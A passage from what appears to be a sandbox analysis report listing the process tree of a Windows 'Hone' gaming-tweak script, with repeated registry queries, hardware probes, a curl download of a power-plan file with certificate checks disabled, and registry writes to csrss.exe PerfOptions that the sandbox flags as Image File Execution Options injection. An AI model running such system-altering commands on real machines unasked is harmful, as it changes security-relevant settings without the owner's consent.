      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "InternetTweaks"
        6⤵
        
        PID:2368
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "ServicesTweaks"
        6⤵
        
        PID:3724
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "DebloatTweaks"
        6⤵
        
        PID:1492
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
        6⤵
        
        PID:3844
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AffinityTweaks"
        6⤵
        
        PID:3156
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
        6⤵
        
        PID:872
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
        6⤵
        
        PID:4268
      - C:\Windows\system32\find.exe
        
        find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
        6⤵
        
        PID:3388
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
        6⤵
        
        PID:1132
      - C:\Windows\system32\find.exe
        
        find "0x400"
        6⤵
        
        PID:2980
      - C:\Windows\system32\sc.exe
        
        sc query STR
        6⤵
        Launches sc.exe
        
        PID:3380
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:4676
      - C:\Windows\system32\sc.exe
        
        sc query HoneAudio
        6⤵
        Launches sc.exe
        
        PID:544
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:2532
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_Battery Get BatteryStatus
        6⤵
        
        PID:3596
      - C:\Windows\system32\find.exe
        
        find "1"
        6⤵
        
        PID:3688
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
        6⤵
        
        PID:4636
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get VideoProcessor /value
        7⤵
        
        PID:2204
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3248
      - C:\Windows\system32\find.exe
        
        find "GeForce"
        6⤵
        
        PID:4484
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1084
      - C:\Windows\system32\find.exe
        
        find "NVIDIA"
        6⤵
        
        PID:3012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:5096
      - C:\Windows\system32\find.exe
        
        find "RTX"
        6⤵
        
        PID:1436
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4648
      - C:\Windows\system32\find.exe
        
        find "GTX"
        6⤵
        
        PID:1544
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3776
      - C:\Windows\system32\find.exe
        
        find "AMD"
        6⤵
        
        PID:2348
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1660
      - C:\Windows\system32\find.exe
        
        find "Ryzen"
        6⤵
        
        PID:4700
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2492
      - C:\Windows\system32\find.exe
        
        find "Intel"
        6⤵
        
        PID:3544
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3788
      - C:\Windows\system32\find.exe
        
        find "UHD"
        6⤵
        
        PID:3632
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo [91mOFF "
        6⤵
        
        PID:3772
      - C:\Windows\system32\find.exe
        
        find "N/A"
        6⤵
        
        PID:4028
      - C:\Windows\system32\curl.exe
        
        curl -g -k -L -# -o "C:\Hone\Resources\HoneV2.pow" "https://github.com/auraside/HoneCtrl/raw/main/Files/HoneV2.pow"
        6⤵
        
        PID:4304
      - C:\Windows\system32\powercfg.exe
        
        powercfg /d 44444444-4444-4444-4444-444444444449
        6⤵
        Power Settings
        
        PID:1936
      - C:\Windows\system32\powercfg.exe
        
        powercfg -import "C:\Hone\Resources\HoneV2.pow" 44444444-4444-4444-4444-444444444449
        6⤵
        Power Settings
        
        PID:1400
      - C:\Windows\system32\powercfg.exe
        
        powercfg /changename 44444444-4444-4444-4444-444444444449 "Hone Ultimate Power Plan V2" "The Ultimate Power Plan to increase FPS, improve latency and reduce input lag."
        6⤵
        Power Settings
        
        PID:4540
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic cpu get numberOfCores /value
        6⤵
        
        PID:3264
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get numberOfCores /value
        7⤵
        
        PID:2548
      - C:\Windows\system32\powercfg.exe
        
        powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 1
        6⤵
        Power Settings
        
        PID:4416
      - C:\Windows\system32\powercfg.exe
        
        powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0
        6⤵
        Power Settings
        
        PID:4592
      - C:\Windows\system32\powercfg.exe
        
        powercfg -setactive "44444444-4444-4444-4444-444444444449"
        6⤵
        Power Settings
        
        PID:408
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:1292
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:3340
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get PNPDeviceID
        7⤵
        
        PID:2868
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:1200
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:3440
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:2376
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:2600
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:4560
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        
        PID:2560
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:5116
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:788
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4808
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:2840
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:5076
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        
        PID:2384
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        6⤵
        
        PID:3988
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        7⤵
        
        PID:5080
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NVTTweaks"
        6⤵
        
        PID:4820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
        6⤵
        
        PID:3796
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
        7⤵
        
        PID:1820
        
        C:\Windows\system32\findstr.exe
        
        findstr "HKEY"
        7⤵
        
        PID:3844
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
        6⤵
        
        PID:2232
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:872
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
        6⤵
        
        PID:1564
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:5092
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
        6⤵
        
        PID:1508
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:2564
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
        6⤵
        
        PID:4464
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:224
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
        6⤵
        
        PID:3656
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:2296
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
        6⤵
        
        PID:2140
      - C:\Windows\system32\find.exe
        
        find "0x4"
        6⤵
        
        PID:3596
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
        6⤵
        
        PID:1116
      - C:\Windows\system32\find.exe
        
        find "0x3"
        6⤵
        
        PID:116
      - C:\Windows\system32\powercfg.exe
        
        powercfg /GetActiveScheme
        6⤵
        Power Settings
        
        PID:3828
      - C:\Windows\system32\find.exe
        
        find "Hone"
        6⤵
        
        PID:1228
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
        6⤵
        
        PID:3272
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NpiTweaks"
        6⤵
        
        PID:4652
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "TCPIP"
        6⤵
        
        PID:560
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
        6⤵
        
        PID:1108
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MemoryTweaks"
        6⤵
        
        PID:1204
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "InternetTweaks"
        6⤵
        
        PID:1788
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "ServicesTweaks"
        6⤵
        
        PID:3936
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "DebloatTweaks"
        6⤵
        
        PID:2344
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
        6⤵
        
        PID:2220
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AffinityTweaks"
        6⤵
        
        PID:3516
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
        6⤵
        
        PID:4700
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
        6⤵
        
        PID:4800
      - C:\Windows\system32\find.exe
        
        find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
        6⤵
        
        PID:1728
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
        6⤵
        
        PID:2496
      - C:\Windows\system32\find.exe
        
        find "0x400"
        6⤵
        
        PID:3788
      - C:\Windows\system32\sc.exe
        
        sc query STR
        6⤵
        Launches sc.exe
        
        PID:3652
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:2968
      - C:\Windows\system32\sc.exe
        
        sc query HoneAudio
        6⤵
        Launches sc.exe
        
        PID:4020
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:3056
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_Battery Get BatteryStatus
        6⤵
        
        PID:2800
      - C:\Windows\system32\find.exe
        
        find "1"
        6⤵
        
        PID:672
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
        6⤵
        
        PID:1220
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get VideoProcessor /value
        7⤵
        
        PID:3348
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3560
      - C:\Windows\system32\find.exe
        
        find "GeForce"
        6⤵
        
        PID:4304
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:676
      - C:\Windows\system32\find.exe
        
        find "NVIDIA"
        6⤵
        
        PID:4540
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2364
      - C:\Windows\system32\find.exe
        
        find "RTX"
        6⤵
        
        PID:3648
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:5112
      - C:\Windows\system32\find.exe
        
        find "GTX"
        6⤵
        
        PID:4416
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4448
      - C:\Windows\system32\find.exe
        
        find "AMD"
        6⤵
        
        PID:4752
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1112
      - C:\Windows\system32\find.exe
        
        find "Ryzen"
        6⤵
        
        PID:2228
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4828
      - C:\Windows\system32\find.exe
        
        find "Intel"
        6⤵
        
        PID:2868
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4628
      - C:\Windows\system32\find.exe
        
        find "UHD"
        6⤵
        
        PID:924
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:3332
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        
        PID:4988
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB" /t REG_DWORD /d 5217772 /f
        6⤵
        
        PID:2580
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:3836
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:1976
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get PNPDeviceID
        7⤵
        
        PID:524
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:788
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:3372
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:2368
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:5076
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:4504
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        
        PID:3988
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:4932
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:4432
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:3844
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:1372
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:4268
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        
        PID:3964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        6⤵
        
        PID:3244
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        7⤵
        
        PID:4576
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NVTTweaks"
        6⤵
        
        PID:2584
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
        6⤵
        
        PID:1044
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
        7⤵
        
        PID:2952
        
        C:\Windows\system32\findstr.exe
        
        findstr "HKEY"
        7⤵
        
        PID:3656
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
        6⤵
        
        PID:3688
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:984
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
        6⤵
        
        PID:1424
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4220
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
        6⤵
        
        PID:3248
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:576
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
        6⤵
        
        PID:2380
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4484
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
        6⤵
        
        PID:4724
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:3012
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
        6⤵
        
        PID:4580
      - C:\Windows\system32\find.exe
        
        find "0x4"
        6⤵
        
        PID:1436
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
        6⤵
        
        PID:3084
      - C:\Windows\system32\find.exe
        
        find "0x3"
        6⤵
        
        PID:1544
      - C:\Windows\system32\powercfg.exe
        
        powercfg /GetActiveScheme
        6⤵
        Power Settings
        
        PID:1644
      - C:\Windows\system32\find.exe
        
        find "Hone"
        6⤵
        
        PID:2220
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
        6⤵
        
        PID:4356
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NpiTweaks"
        6⤵
        
        PID:2492
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "TCPIP"
        6⤵
        
        PID:4800
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
        6⤵
        
        PID:1432
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MemoryTweaks"
        6⤵
        
        PID:2496
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "InternetTweaks"
        6⤵
        
        PID:4412
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "ServicesTweaks"
        6⤵
        
        PID:2084
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "DebloatTweaks"
        6⤵
        
        PID:5084
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
        6⤵
        
        PID:4452
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AffinityTweaks"
        6⤵
        
        PID:4588
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
        6⤵
        
        PID:700
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
        6⤵
        
        PID:2800
      - C:\Windows\system32\find.exe
        
        find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
        6⤵
        
        PID:672
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
        6⤵
        
        PID:3080
      - C:\Windows\system32\find.exe
        
        find "0x400"
        6⤵
        
        PID:4736
      - C:\Windows\system32\sc.exe
        
        sc query STR
        6⤵
        Launches sc.exe
        
        PID:2636
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:1936
      - C:\Windows\system32\sc.exe
        
        sc query HoneAudio
        6⤵
        Launches sc.exe
        
        PID:1164
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:3740
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_Battery Get BatteryStatus
        6⤵
        
        PID:3792
      - C:\Windows\system32\find.exe
        
        find "1"
        6⤵
        
        PID:3264
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
        6⤵
        
        PID:4592
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get VideoProcessor /value
        7⤵
        
        PID:2728
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1076
      - C:\Windows\system32\find.exe
        
        find "GeForce"
        6⤵
        
        PID:1112
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4048
      - C:\Windows\system32\find.exe
        
        find "NVIDIA"
        6⤵
        
        PID:4828
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4796
      - C:\Windows\system32\find.exe
        
        find "RTX"
        6⤵
        
        PID:4628
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2976
      - C:\Windows\system32\find.exe
        
        find "GTX"
        6⤵
        
        PID:4904
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:456
      - C:\Windows\system32\find.exe
        
        find "AMD"
        6⤵
        
        PID:2376
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:5116
      - C:\Windows\system32\find.exe
        
        find "Ryzen"
        6⤵
        
        PID:1720
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3724
      - C:\Windows\system32\find.exe
        
        find "Intel"
        6⤵
        
        PID:1956
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4168
      - C:\Windows\system32\find.exe
        
        find "UHD"
        6⤵
        
        PID:4560
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass /t Reg_DWORD /d "4" /f
        6⤵
        Event Triggered Execution: Image File Execution Options Injection
        
        PID:4392
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority /t Reg_DWORD /d "3" /f
        6⤵
        Event Triggered Execution: Image File Execution Options Injection
        
        PID:1820
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NoLazyMode" /t REG_DWORD /d "1" /f
        6⤵
        
        PID:2844
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "AlwaysOn" /t REG_DWORD /d "1" /f
        6⤵
        
        PID:4296
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NetworkThrottlingIndex" /t REG_DWORD /d "10" /f
        6⤵
        
        PID:5080
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "SystemResponsiveness" /t REG_DWORD /d "0" /f
        6⤵
        
        PID:3796
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:4432
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:2232
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get PNPDeviceID
        7⤵
        
        PID:2980
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:1564
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:544
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:3380
      - C:\Windows\system32\reg.exe
        
